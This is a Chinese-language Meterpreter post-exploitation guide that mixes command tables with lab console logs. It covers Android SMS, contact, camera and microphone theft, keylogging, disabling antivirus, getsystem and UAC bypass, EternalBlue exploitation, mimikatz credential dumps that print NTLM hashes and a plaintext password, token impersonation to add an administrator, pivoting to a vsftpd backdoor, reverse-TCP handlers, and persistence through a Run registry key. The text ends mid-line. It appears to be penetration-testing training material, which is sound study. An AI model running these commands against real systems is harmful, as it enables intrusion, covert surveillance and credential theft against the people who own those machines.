Meterpreter指南(后渗透技术)
基本命令
meterpreter常用命令
命令 |
作用 |
|
background |
返回,把Meterpreter后台挂起 |
|
sessions |
查看当前建立的会话 |
|
sessions -i number |
与第n个会话进行交互 |
|
sessions -i |
显示当前的回话 |
|
sessions -k number |
与第n个会话进行交互关闭 |
|
bgkill |
杀死一个 Meterpreter 脚本 |
|
bglist |
提供所有正在运行的后台脚本的列表 |
|
bgrun |
作为一个后台线程运行脚本 |
|
channel |
显示活动频道 |
|
close |
关闭通道 |
|
exit |
终止 Meterpreter 会话 |
|
quit |
终止 Meterpreter 会话 |
|
interact id |
切换进一个信道 |
|
run |
执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的autoroute,hashdump,arp_scanner,multi_meter_inject等 |
|
irb |
进入 Ruby 脚本模式 |
|
read |
从通道读取数据write# 将数据写入到一个通道 |
|
use |
加载 meterpreter 的扩展 |
|
load/use |
加载模块 |
|
Resource |
执行一个已有的rc脚本 |
|
针对安卓的命令
dump_contacts
获取手机通讯录
dump_sms
获取短信记录
send_sms -d 15330252525 -t “hello”
控制实验手机发短信
geolocate
获取实验手机GPS定位信息
wlan_geolocate
获取实验手机Wi-Fi定位信息
record_mic -d 5
控制实验手机录音
webcam_list
获取实验手机相机设备
webcam_snap
控制实验手机拍照
webcam_stream
直播实验手机摄像头
针对Windows的一些命令
ps
查看进程:
getpid
查看当前进程号:
sysinfo
查看系统信息:
route
查看完整网络设置:
getsystem
自动提权
getuid
查看当前权限
pwd
查看当前处于目标机的那个目录
其他命令
查看目标机是否为虚拟机:run post/windows/gather/checkvm
关闭杀毒软件:run post/windows/manage/killav
启动远程桌面协议:run post/windows/manage/enable_rdp
列举当前登录的用户:run post/windows/gather/enum_logged_on_users
查看当前应用程序:run post/windows/gather/enum_applications
抓取目标机的屏幕截图:load espia ; screengrab
获取相机设备:webcam_list
控制拍照:webcam_snap
直播摄像头:webcam_stream
控制录音:record_mic
查看当前目录:getlwd
导出当前用户密码哈希 run hashdump
用户名:SID:LM哈希:NTLM哈希:::
也可以使用下面这个命令导出权限更高 run windows/gather/smart_hashdump
抓取自动登录的用户名和密码 run windows/gather/credentials/windows_autologin
直接获取明文密码(注意这个功能需要获取系统权限获取系统权限需要输入getsystem)
Shell 脚本
进入Windows的终端shell
文件系统命令
文件交互指令
ID |
Command |
Description |
1 |
cat |
读取文件内容 |
2 |
cd |
切换靶机目录 |
3 |
cp |
复制文件到目标 |
4 |
mv |
移动到目标 |
5 |
chmod |
修改文件权限(比如chmod 777 shell.elf) |
6 |
del / rm |
删除靶机文件 |
7 |
dir |
打印靶机目录 |
8 |
mkdir |
在靶机上创建目录 |
9 |
rmdir |
删除靶机目录 |
10 |
edit |
编辑文件 |
11 |
getlwd |
打印本地目录 |
12 |
getwd |
打印靶机目录 |
13 |
lcd |
更改本地目录 |
14 |
lls |
列出本地目录 |
15 |
ls |
列出靶机文件目录 |
16 |
lpwd |
打印本地目录 |
17 |
pwd |
打印工作目录 |
19 |
search |
搜索文件详情search -h |
Linux权限
chmod 777 {文件名.后缀}
chmod 777 shell.elf
upload
上传文件到目标机主上,如upload setup.exe C:\windows\system32
download nimeia.txt /root/Desktop/
# 下载文件到本机上如:download C:\boot.ini /root/或者download C:\“ProgramFiles”\Tencent\QQ\Users\295******125\Msg2.0.db /root/
search
search 文件,如
search -d c:\ -f*.doc
search -d c:\Users\xiang\Desktop -f *.txt
enumdesktops
用户登录数
ipconfig
查看IP地址
其他命令
截屏
meterpreter > screenshot
Screenshot saved to: /home/jerry/BqXLvJAp.jpeg
获得系统信息
meterpreter > sysinfo Computer : WIN-2VEIIKHJ7M8 OS : Windows 7 (6.1 Build 7601, Service Pack 1). Architecture : x64 System Language : zh_CN Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows
获取键盘信息
meterpreter > ps Process List ============ PID PPID NameArch Session User Path … exe 1184 1132 explorer.exex64 1 WIN-2VEIIKHJ7M8\小铃铛 C:\Windows\Explorer.EXE meterpreter > migrate 1184 迁移到1184进程中 [*] Migrating from 2496 to 1184... [*] Migration completed successfully. meterpreter > run post/windows/capture/keylog_recorder [*] Executing module against WIN-2VEIIKHJ7M8 [*] Starting the keylog recorder... [*] Keystrokes being saved in to /root/.msf4/loot/20220624132219_default_192.168.0.158_host.windows.key_244146.txt [*] Recording keystrokes... ^C[*] User interrupt. [*] Shutting down keylog recorder. Please wait... # cat /root/.msf4/loot/20220624132219_default_192.168.0.158_host.windows.key_244146.txt Keystroke log from explorer.exe on WIN-2VEIIKHJ7M8 with user WIN-2VEIIKHJ7M8\小铃铛 started at 2022-06-24 13:22:19 +0800 tgest <^H><^H><^H><^H><^H><^H>test I a mFy<^H><^H>Gu Xiang www. 3 Keylog Recorder exited at 2022-06-24 13:24:03 +0800
提权
最基础的提权
meterpreter > getuid Server username: E86004903967404\Administrator meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
利用漏洞提权
Windows 7
meterpreter > background msf6 exploit(windows/local/ms15_051_client_copy_image) > use exploit/windows/smb/ms17_010_eternalblue [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_eternalblue [*] Using configured payload windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/smb/ms17_010_eternalblue) > set SESSION 1 SESSION => 1msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.0.168 rhost => 192.168.0.168 msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
绕过UAC提权
Windows 7
用户账户控制(User Account Control,简写作UAC)是微软公司在其Windows Vista及更高版本操作系统中采用的一种控制机制。其原理是通知用户是否对应用程序使用硬盘驱动器和系统文件授权,以达到帮助阻止恶意程序(有时也称为“恶意软件”)损坏系统的效果。
meterpreter > background msf6 exploit(multi/handler) > use exploit/windows/local/bypassuac [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows/local/bypassuac) > set session 2 session => 2 msf6 exploit(windows/local/bypassuac) > exploit [*] Started reverse TCP handler on 192.168.0.150:4444 [*] UAC is Enabled, checking level... [+] UAC is set to Default [+] BypassUAC can bypass this setting, continuing... … [*] Meterpreter session 3 opened (192.168.0.150:4444 -> 192.168.0.168:58389) at 2022-07-19 15:45:06 +0800 meterpreter > getuid Server username: WIN-2VEIIKHJ7M8\小铃铛 meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter >
触发UAC机制
Windows 10
meterpreter > background [*] Backgrounding session 1... msf6 exploit(multi/handler) > use exploit/windows/local/ask [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows/local/ask) > set session 1 session => 1 msf6 exploit(windows/local/ask) > set filename payload.exe filename => payload.exe msf6 exploit(windows/local/ask) > exploit [*] Started reverse TCP handler on 192.168.0.150:4444 [*] UAC is Enabled, checking level... [*] The user will be prompted, wait for them to click 'Ok' [*] Uploading payload.exe - 73802 bytes to the filesystem... [*] Executing Command! [*] Sending stage (175686 bytes) to 192.168.0.106 [*] Meterpreter session 2 opened (192.168.0.150:4444 -> 192.168.0.106:2513) at 2022-06-27 11:39:52 +0800 meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
获取用户名密码
提取密码哈希值
Windows 10
meterpreter > getsystem meterpreter > run post/windows/gather/hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 4368ea4193e43ce242a9fec38c370ea2... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hints... No users with password hints on this system [*] Dumping password hashes... Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:ca24769333d0f9419d17e86998b56519::: xiang:1001:aad3b435b51404eeaad3b435b51404ee:4f151ab2d4afdef65f9664b0422ad83f::: meterpreter > ps | grep lsass Filtering on 'lsass' Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 736 644 lsass.exe x64 0NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe meterpreter > migrate 736 [*] Migrating from 5724 to 736... [*] Migration completed successfully. meterpreter > load kiwi Loading extension kiwi...' .#####. mimikatz 2.2.0 20191125 (x64/windows) .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##'Vincent LE TOUX( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ Success. meterpreter > kiwi_cmd sekurlsa::logonpasswords … SID : S-1-5-21-2772671008-4265266102-715737954-1001 msv : [00000003] Primary * Username : xianggu625@126.com * Domain : MicrosoftAccount * NTLM : 4f151ab2d4afdef65f9664b0422ad83f tspkg : wdigest : * Username : xianggu625@126.com * Domain : MicrosoftAccount * Password : (null) kerberos : * Username : xianggu625@126.com * Domain : MicrosoftAccount * Password : (null) ssp : credman : cloudap : …
重新进入
msf6 exploit(windows/local/ask) > use exploit/multi/handler [*] Using configured payload windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set lhost 192.168.0.150 lhost => 192.168.0.150 msf6 exploit(multi/handler) > set lport 4444 lport => 443 msf6 exploit(multi/handler) set rhost 192.168.0.106 rhost => 192.168.0.106 msf6 exploit(multi/handler) set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) set SMBPass aad3b435b51404eeaad3b435b51404ee:4f151ab2d4afdef65f9664b0422ad83f SMBPass => aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4 msf6 exploit(multi/handler) exploit [*] Started reverse TCP handler on 192.168.0.150:4444 [*] Sending stage (175686 bytes) to 192.168.0.106 [*] Sending stage (175686 bytes) to 192.168.0.106 [*] Meterpreter session 2 opened (192.168.0.150:4444 -> 192.168.0.106:21198) at 2022-06-27 16:14:14 +0800 [*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.106:21197) at 2022-06-27 16:14:14 +0800 meterpreter >
Windows7
meterpreter > getsystem [-] Already running as SYSTEM meterpreter > run post/windows/gather/hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 7a3026b2f119d51ec136ea51a0acddd6... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hints... No users with password hints on this system [*] Dumping password hashes... Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: 小铃铛:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4::: meterpreter > ps | grep lsass Filtering on 'lsass' Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 512 396 lsass.exe x64 0NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe meterpreter > migrate 512 [*] Migrating from 1672 to 512... [*] Migration completed successfully. meterpreter > load kiwi Loading extension kiwi... .#####. mimikatz 2.2.0 20191125 (x64/windows) .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##'Vincent LE TOUX( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ Success. meterpreter > kiwi_cmd sekurlsa::logonpasswords Authentication Id : 0 ; 81005 (00000000:00013c6d) Session : Interactive from 1 User Name : : WIN-2VEIIKHJ7M8 * LM : 44efce164ab921caaad3b435b51404ee * NTLM : 32ed87bdb5fdc5e9cba88547376818d4 * SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f tspkg : * Username : (null) * Domain : WIN-2VEIIKHJ7M8 * Password : 123456 wdigest : * Username : (null) * Domain : WIN-2VEIIKHJ7M8 * Password : 123456 kerberos : * Username : (null) * Domain : WIN-2VEIIKHJ7M8 * Password : 123456 ssp : credman : [00000000]��� PPgN .#####. mimikatz 2.2.0 (x64) #19041 May 17 2022 19:25:29 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####'> https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz(powershell) # sekurlsa::logonpasswords Authentication Id : 0 ; 81005 (00000000:00013c6d) Session : Interactive from 1 User Name : \Ô۔ Domain: WIN-2VEIIKHJ7M8 Logon Server : WIN-2VEIIKHJ7M8 Logon Time: 2022/6/27 14:58:54 SID : S-1-5-21-2305812133-3308626755-1024735854-1000 msv : [00000003] Primary * Username : \Ô۔ * Domain : WIN-2VEIIKHJ7M8 * LM : 44efce164ab921caaad3b435b51404ee * NTLM : 32ed87bdb5fdc5e9cba88547376818d4 * SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f tspkg : * Username : (null) * Domain : WIN-2VEIIKHJ7M8 * Password : 123456 wdigest : * Username : (null) * Domain : WIN-2VEIIKHJ7M8 * Password : 123456 kerberos : * Username : (null) *
重新进入
msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set lhost 192.168.0.150 lhost => 192.168.0.150 msf6 exploit(multi/handler) > set lport 4444 lport => 4444 msf6 exploit(multi/handler) > set rhost 192.168.0.158 rhost => 192.168.0.158 msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set SMBPass 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4 SMBPass => 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4 msf6 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.0.150:4444 [*] Sending stage (175686 bytes) to 192.168.0.158 [*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.158:49194) at 2022-06-27 17:20:14 +0800 meterpreter >
令牌假冒添加用户
meterpreter > ps | grep lsass Filtering on 'lsass' Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 736 644 lsass.exe x64 0NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe meterpreter > steal_token 736 Stolen token with username: NT AUTHORITY\SYSTEM meterpreter > use incognito Loading extension incognito...Success. meterpreter > list_tokens -u Delegation Tokens Available ======================================== DESKTOP-9A8VFKB\xiang NT AUTHORITY\LOCAL SERVICE NT AUTHORITY\NETWORK SERVICE NT AUTHORITY\SYSTEM NT SERVICE\ReportServer Window Manager\DWM-1 Impersonation Tokens Available ======================================== Font Driver Host\UMFD-0 Font Driver Host\UMFD-1 NT AUTHORITY\ANONYMOUS LOGON NT SERVICE\MSSQLFDLauncher NT SERVICE\MSSQLSERVER NT SERVICE\MSSQLServerOLAPService meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM" [+] Delegation token available [+] Successfully impersonated user NT AUTHORITY\SYSTEM meterpreter > add_user tom 123456 -h 192.168.0.106 [*] Attempting to add user tom to host 192.168.0.106 [+] Successfully added user meterpreter > add_group_user "administrators" tom -h 192.168.0.106 …
跳板
目标为安装vsftpd V2.3.4的Linux机器
Windows10->vsftpd V2.3.4的Linux机器
meterpreter > run get_local_subnets [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute. [!] Example: run post/multi/manage/autoroute OPTION=value [...] Local subnet: 192.168.0.0/255.255.255.0 Local subnet: 192.168.5.0/255.255.255.0 Local subnet: 192.168.81.0/255.255.255.0 meterpreter > background [*] Backgrounding session 3... msf6 exploit(windows/local/ask) > route add 192.168.0.0 255.255.255.0 3 [*] Route added msf6 exploit(windows/local/ask) > route print IPv4 Active Routing Table ========================= Subnet Netmask Gateway ------ ------- ------- 192.168.0.0 255.255.255.0 Session 3 [*] There are currently no IPv6 routes defined. msf6 exploit(windows/smb/ms17_010_eternalblue) > use exploit/unix/ftp/vsftpd_234_backdoor [*] No payload configured, defaulting to cmd/unix/interact msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact payload => cmd/unix/interact msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.0.171 rhost => 192.168.0.171 sf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit [*] 192.168.0.171:21 - Banner: 220 (vsFTPd 2.3.4) [*] 192.168.0.171:21 - USER: 331 Please specify the password. [+] 192.168.0.171:21 - Backdoor service has been spawned, handling... [+] 192.168.0.171:21 - UID: uid=0(root) gid=0(root) [*] Found shell. [*] Command shell session 4 opened (192.168.0.106:29720 -> 192.168.0.171:6200 via session 3) at 2022-07-19 17:00:32 +0800
使用Meterpreter运行脚本
运行VNC
Windows 10
meterpreter > run vnc [*] Creating a VNC reverse tcp stager: LHOST=192.168.0.150 LPORT=4545 [*] Running payload handler [*] VNC stager executable 73802 bytes long [*] Uploaded the VNC agent to C:\Users\xiang\AppData\Local\Temp\eiISyc.exe (must be deleted manually) [*] Executing the VNC agent with endpoint 192.168.0.150:4545... [-] Could not execute vnc: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Access is denied. 到windows里面运行C:\Users\xiang\AppData\Local\Temp\eiISyc.exe会看到效果 meterpreter > [*] VNC Server session 3 opened (192.168.0.150:4545 -> 192.168.0.106:8611) at 2022-06-28 11:38:32 +0800 Connected to RFB server, using protocol version 3.8 Enabling TightVNC protocol extensions No authentication needed Authentication successful Desktop name "desktop-9a8vfkb" VNC server default format: 32 bits per pixel. Least significant byte first in each pixel. True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0 Using default colormap which is TrueColor. Pixel format: 32 bits per pixel. Least significant byte first in each pixel. True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0 Same machine: preferring raw encoding
Windows 7
meterpreter > run vnc [*] Creating a VNC reverse tcp stager: LHOST=192.168.0.150 LPORT=4545 [*] Running payload handler [*] VNC stager executable 73802 bytes long [*] Uploaded the VNC agent to C:\Windows\TEMP\YNpMWsIZ.exe (must be deleted manually) [*] Executing the VNC agent with endpoint 192.168.0.150:4545... meterpreter > Connected to RFB server, using protocol version 3.8 Enabling TightVNC protocol extensions No authentication needed Authentication successful [*] VNC Server session 2 opened (192.168.0.150:4545 -> 192.168.0.158:49170) at 2022-06-28 12:22:50 +0800 Desktop name "win-2veiikhj7m8" VNC server default format: 32 bits per pixel. Least significant byte first in each pixel. True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0 Using default colormap which is TrueColor. Pixel format: 32 bits per pixel. Least significant byte first in each pixel. True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0 Same machine: preferring raw encoding
迁移进程
meterpreter > run post/windows/manage/migrate [*] Running module against DESKTOP-9A8VFKB [*] Current server process: payload.exe (8716) [*] Spawning notepad.exe process to migrate into [*] Spoofing PPID 0 [*] Migrating into 9944 [+] Successfully migrated into process 9944
关闭杀毒软件
meterpreter > run killav [!] Meterpreter scripts are deprecated. Try post/windows/manage/killav. [!] Example: run post/windows/manage/killav OPTION=value [...] [*] Killing Antivirus services on the target...
获取系统密码哈希值
meterpreter > run hashdump [!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump. [!] Example: run post/windows/gather/smart_hashdump OPTION=value [...] [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 4368ea4193e43ce242a9fec38c370ea2... [*] Obtaining the user list and keys... [*] Decrypting user keys... [-] Error: ArgumentError wrong number of arguments (given 4, expected 5) …
所以改用
meterpreter > run post/windows/gather/smart_hashdump [*] Running module against DESKTOP-9A8VFKB [*] Hashes will be saved to the database if one is connected. [+] Hashes will be saved in loot in JtR password file format to: [*] /root/.msf4/loot/20220628120236_default_192.168.0.106_windows.hashes_115893.txt [*] Dumping password hashes... [*] Running as SYSTEM extracting hashes from registry [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 4368ea4193e43ce242a9fec38c370ea2... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hints... [*] No users with password hints on this system [*] Dumping password hashes... [+]Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [+]DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [+]WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [+] xiang:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [+] tom:1010:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
或
meterpreter > run post/windows/gather/hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 7a3026b2f119d51ec136ea51a0acddd6... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hints... No users with password hints on this system [*] Dumping password hashes... Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: 小铃铛:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4::: tom:1001:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
获取目标机上流量
目标机必须支持:rpcapd service,在Windows上安装winpcap即可
meterpreter > run post/windows/manage/rpcapd_start [*] Checking if machine DESKTOP-9A8VFKB has rpcapd service [*] Rpcap service found: Remote Packet Capture Protocol v.0 (experimental) [*] Setting rpcapd as 'auto' service [*] Enabling rpcapd.exe in Windows Firewall [*] Installing rpcap in PASSIVE mode (local port: 2002) [+] Rpcapd started successfully: C:\Program Files (x86)\winpcap\rpcapd.exe -d -p 2002 -n
获取系统信息
Windows 10
meterpreter >run scraper [*] New session on 192.168.0.106:7216... [*] Gathering basic system information... [-] Failed to run command net view [-] Error: Rex::TimeoutError Operation timed out. [*] Error dumping hashes: Rex::Post::Meterpreter::RequestError priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect. [*] Obtaining the entire registry... [*] Exporting HKCU [*] Downloading HKCU (C:\Users\xiang\AppData\Local\Temp\WLNUaYcc.reg) [*] Cleaning HKCU [*] Exporting HKLM [-] Failed to run command reg.exe export HKLM C:\Users\xiang\AppData\Local\Temp\IymTDekJ.reg [-] Error: Rex::TimeoutError Operation timed out. [*] Downloading HKLM (C:\Users\xiang\AppData\Local\Temp\IymTDekJ.reg) [*] Exception: Rex::Post::
Windows 7
meterpreter > run scraper [*] New session on 192.168.0.158:445... [*] Gathering basic system information... [*] Dumping password hashes... [*] Obtaining the entire registry... [*] Exporting HKCU [*] Downloading HKCU (C:\Windows\TEMP\sbOwIdlG.reg) [*] Cleaning HKCU [*] Exporting HKLM [*] Downloading HKLM (C:\Windows\TEMP\pQzbPtfD.reg) [*] Cleaning HKLM [*] Exporting HKCC [*] Downloading HKCC (C:\Windows\TEMP\xdgVency.reg) [*] Cleaning HKCC [*] Exporting HKCR [*] Downloading HKCR (C:\Windows\TEMP\aWoyKSRV.reg) [*] Cleaning HKCR [*] Exporting HKU [*] Downloading HKU (C:\Windows\TEMP\abgTRNGl.reg) [*] Cleaning HKU [*] Completed processing on 192.168.0.158:445...
Windows 2003
meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > run scraper [*] New session on 192.168.0.169:1438... [*] Gathering basic system information... [*] Error dumping hashes: Rex::Post::Meterpreter::RequestError priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect. [*] Obtaining the entire registry... [*] Exporting HKCU [*] Downloading HKCU (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\IatUIdPZ.reg) [*] Cleaning HKCU [*] Exporting HKLM [*] Downloading HKLM (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\JcjKKLfF.reg) [*] Cleaning HKLM [*] Exporting HKCC [*] Downloading HKCC (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\gLgAxVWq.reg) [*] Cleaning HKCC [*] Exporting HKCR [*] Downloading HKCR (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\KDJAycay.reg) [*] Cleaning HKCR [*] Exporting HKU [*] Downloading HKU (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\zebuwlsT.reg) [*] Cleaning HKU [*] Completed processing on 192.168.0.169:1438...
控制持久化
meterpreter > run persistence -X -i 50 -p 8888 -r 192.168.0.106
启动meterpreter:-X
50秒后重连:-i 50
使用端口8888:-p 8888
目的IP 192.168.0.106:-r 192.168.0.106
meterpreter > run persistence -X -i 50 -p 8888 -r 192.168.0.106 [!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence. [!] Example: run exploit/windows/local/persistence OPTION=value [...] [*] Running Persistence Script [*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-2VEIIKHJ7M8_20220628.5835/WIN-2VEIIKHJ7M8_20220628.5835.rc [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=8888 [*] Persistent agent script is 99674 bytes long [+] Persistent Script written to C:\Windows\TEMP\QQxsjpmT.vbs [*] Executing script C:\Windows\TEMP\QQxsjpmT.vbs [+] Agent executed with PID 2580 [*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MdedIPrvpFMB [+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MdedIPrvpFMB
Windows7成功
将命令行shell升级为Metewrpreter
msf6> use exploit/windows/smb/ms17_010_eternalblue [*] Using configured payload windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/smb/ms17_010_eternalblue) > setg rhost 192.168.0.158 rhost => 192.168.0.158 msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit -z
-z:攻击成功,在后台,不进入
[*] Started reverse TCP handler on 192.168.0.150:4444 [*] 192.168.0.158:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 192.168.0.158:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit) [*] 192.168.0.158:445 - Scanned 1 of 1 hosts (100% complete) [+] 192.168.0.158:445 - The target is vulnerable. [*] 192.168.0.158:445 - Connecting to target for exploitation. [+] 192.168.0.158:445 - Connection established for exploitation. [+] 192.168.0.158:445 - Target OS selected valid for OS indicated by SMB reply [*] 192.168.0.158:445 - CORE raw buffer dump (40 bytes) [*] 192.168.0.158:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42 Windows 7 Home B [*] 192.168.0.158:445 - 0x00000010 61 73 69 63 20 37 36 30 31 20 53 65 72 76 69 63 asic 7601 Servic [*] 192.168.0.158:445 - 0x00000020 65 20 50 61 63 6b 20 31 e Pack 1 [+] 192.168.0.158:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 192.168.0.158:445 - Trying exploit with 12 Groom Allocations. [*] 192.168.0.158:445 - Sending all but last fragment of exploit packet [*] 192.168.0.158:445 - Starting non-paged pool grooming [+] 192.168.0.158:445 - Sending SMBv2 buffers [+] 192.168.0.158:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 192.168.0.158:445 - Sending final SMBv2 buffers. [*] 192.168.0.158:445 - Sending last fragment of exploit packet! [*] 192.168.0.158:445 - Receiving response from exploit packet [+] 192.168.0.158:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 192.168.0.158:445 - Sending egg to corrupted connection. [*] 192.168.0.158:445 - Triggering free of corrupted buffer. [*] Sending stage (200774 bytes) to 192.168.0.158 [*] Meterpreter session 3 opened (192.168.0.150:4444 -> 192.168.0.158:49321) at 2022-06-28 14:13:48 +0800 [+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [*] Session 3 created in the background. msf6 exploit(windows/smb/ms17_010_eternalblue) > session -u 3 [-] Unknown command: session msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -u 3 [*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [3] [*] Upgrading session ID: 3 [*] Starting exploit/multi/handler [*] Started reverse TCP handler on 192.168.0.150:4433 msf6 exploit(windows/smb/ms17_010_eternalblue) > [*] Sending stage (200774 bytes) to 192.168.0.158 [*] Meterpreter session 4 opened (192.168.0.150:4433 -> 192.168.0.158:49325) at 2022-06-28 14:14:39 +0800 [*] Stopping exploit/multi/handler msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 4 [*] Starting interaction with 4...*/ meterpreter > meterpreter > irb [*] Starting IRB shell... [*] You are in the "client" (session) object irb: warn: can't 